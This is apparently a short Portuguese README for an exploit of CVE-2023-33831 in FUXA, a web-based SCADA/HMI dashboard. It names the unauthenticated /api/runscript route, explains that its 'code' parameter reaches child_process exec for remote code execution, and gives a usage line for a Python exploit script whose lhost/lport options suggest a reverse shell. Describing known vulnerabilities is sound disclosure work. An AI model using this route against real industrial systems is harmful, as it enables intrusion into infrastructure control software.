Descrição e exploração de CVE-2023-33831 afetando o software de Visualização de Processos baseado na web FUXA (SCADA/HMI/Dashboard).
A vulnerabilidade afeta o componente de script do FUXA, devido à falta de controle ou sanitização em entradas que podem ser controladas pelos usuários, permitindo assim o uso de métodos perigosos que podem ser escalados para execução remota de código. A rota afetada é /api/runscript, onde é possível executar comandos sem a necessidade de autenticação através do parâmetro code via método POST usando o módulo child_process através da função exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>